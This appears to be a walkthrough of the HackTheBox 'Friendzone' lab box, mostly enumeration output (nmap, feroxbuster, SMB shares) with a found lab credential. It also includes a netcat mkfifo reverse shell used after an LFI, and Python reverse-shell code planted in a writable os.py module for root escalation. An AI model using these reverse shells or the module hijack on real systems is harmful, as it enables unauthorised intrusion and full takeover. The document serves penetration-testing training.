Friendzone | HTB | OSCP | Box 11
Part of TJ Null OSCP-like Box Series
Published in
11 min readNov 5, 2021
Enumeration
NMAP
┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# nmap -A -sV -sC -O -p- 10.10.10.123
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-02 03:40 EDT
Nmap scan report for 10.10.10.123
Host is up (0.10s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=11/2%OT=21%CT=1%CU=36889%PV=Y%DS=2%DC=T%G=Y%TM=6180ED1
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=A)SEQ
OS:(SP=FB%GCD=1%ISR=104%TI=Z%TS=A)OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54D
OS:NNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W
OS:3=7120%W4=7120%W5=7120%W6=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=
OS:Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=N)T7(R=Y%DF=
OS:Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G
OS:%RID=G%RIPCK=G%RUCK=G%RUD=G)U1(R=N)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: -37m42s, deviation: 1h09m16s, median: 2m16s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2021-11-02T09:49:37+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-11-02T07:49:37
|_ start_date: N/ATRACEROUTE (using port 587/tcp)
HOP RTT ADDRESS
1 112.29 ms 10.10.14.1
2 113.33 ms 10.10.10.123OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 402.29 seconds
Port 21 — vsftpd 3.0.3
Port 22 — OpenSSH 7.6p1 Ubuntu 4
Port 53 — ISC BIND 9.11.3–1ubuntu1.2
Port 80 — Apache httpd 2.4.29
port 139 — netbios-ssn Samba smbd 3.X — 4.X
Port 443 — Apache httpd 2.4.29
Port 445 — netbios-ssn Samba smbd 4.7.6-Ubuntu
Port 21
Anonymous login not allowed
DNS ( Port 53)
I Found domain friendzone.red (from port 443 — but for the purpose of making this write-up organised — I putting all screen related to port 53 here)
But, the following command gave me, interesting domain
Then, I focused on friendzoneportal.red:
friendzone.red
administrator1.friendzone.red
hr.friendzone.red
uploads.friendzone.redadmin.friendzoneportal.red
files.friendzoneportal.red
imports.friendzoneportal.red
vpn.friendzoneportal.red
Added all of them to /etc/hosts
Port 80 and 443
Landing Page at port 80
Source:
Landing Page at port 443
Certificate at port 443
Added in /etc/hosts file
Visiting the domain over HTTP
source:
There is no data hidden in the picture
Over HTTPS
Source:
Looks like a hint
No idea about it.
Directory Brute Force
┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# feroxbuster --url http://10.10.10.123 --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o port80.log___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.10.123
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💾 Output File │ port80.log
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
[####################] - 8m 441090/441090 0s found:2 errors:0
[####################] - 8m 220545/220545 446/s http://10.10.10.123
[####################] - 8m 220545/220545 448/s http://10.10.10.123/wordpress
Found 2:
http://10.10.10.123
http://10.10.10.123/wordpress***
┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# feroxbuster --url https://10.10.10.123/ --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -k -o port443.log___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://10.10.10.123/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💾 Output File │ port443.log
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403 11l 32w 301c https://10.10.10.123/server-status
[####################] - 8m 220545/220545 0s found:1 errors:3
[####################] - 8m 220545/220545 444/s https://10.10.10.123/
Found 2
https://10.10.10.123/server-status***
┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# feroxbuster --url http://friendzone.red --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o friendzone_red.log___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://friendzone.red
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
💾 Output File │ friendzone_red.log
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 9l 28w 320c http://friendzone.red/wordpress
403 11l 32w 302c http://friendzone.red/server-status
[####################] - 11m 441090/441090 0s found:2 errors:2058
[####################] - 11m 220545/220545 315/s http://friendzone.red
[####################] - 11m 220545/220545 316/s http://friendzone.red/wordpress
found 2:
http://friendzone.red/wordpress
http://friendzone.red/server-statusI enumerated HTTP://friendzone.red/wordpress/ further , but nothing really was found.
***
https://uploads.friendzone.red
┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# feroxbuster --url https://uploads.friendzone.red/ --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -k___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://uploads.friendzone.red/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 9l 28w 334c https://uploads.friendzone.red/files
200 1l 3w 20c https://uploads.friendzone.red/files/note
[####################] - 3m 441090/441090 0s found:2 errors:301545
[####################] - 3m 220545/220545 965/s https://uploads.friendzone.red/
[####################] - 3m 220545/220545 971/s https://uploads.friendzone.red/files
I expermiented with it by uploading files and tried to find a way to call the file. I nothing useful
I did a lot of directory brute forcing on various domains and subpages I found (it’s not worth putting details or screenshot as those had no role in compromising this box)
***
Port 445
I found creds.txt
admin:WORKWORKHhallelujah@#Further, I wanted to make sure, I have no access to the files directory.
To get more information about shares, I ran nmap command
nmap --script smb-enum-shares -p 139,445 10.10.10.123output
┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# nmap --script smb-enum-shares -p 139,445 10.10.10.123
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-04 04:00 EDT
Nmap scan report for friendzone.red (10.10.10.123)
Host is up (0.11s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 1
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 26.64 secondsThis gave me, some idea of location of shares with the target system.
Precursor to Initial foothold
HTTPS://administrator1.friendzone.red
There was login page ( used the creds I found smb shares- smb share enumeration)
As it said, when I added:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
I tried the use the timestamp (I got from uploads.friendzone.red when I uploaded a test.php file — as shown above)
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=1636104675except the timestamp, everything is same.
I played this domain further.
┌──(root💀kali)-[/home/kali/htb/friendzone]
└─# feroxbuster --url https://administrator1.friendzone.red/ --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -k___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://administrator1.friendzone.red/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 9l 28w 349c https://administrator1.friendzone.red/images403 11l 32w 318c https://administrator1.friendzone.red/server-status
[####################] - 8m 441090/441090 0s found:2 errors:5
I tried the image page but nothing interesting
But, if go directly page (page named as ) timestamp.
After many cycles of hit and trial, I was able to identify an LFI that helped got a initial foothold
Initial Foothold
Reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.8 4444 >/tmp/f
User.txt
Privilege Escalation
I was able to switch to friend user.
I was able to that by using the password I found in /opt/www/mysql_data.conf file.
To get better shell, I ssh as friend into the box (same password worked)
I found an interesting script
we can’t really edit this post.
After running few tools and further enumeration, I noticed that this script is being executed with UID=0 (means root)
and this script also import python module os, and I found os.py module writable.
Use following command:
find / -type f -writable -ls 2>/dev/null | grep pythonI added the following code in the os module. It’s a reverse shelll.
import pty
import sockets=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.8",4455))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()
got the shell back
Shell was indeed horrible, but got root.txt
root.txt
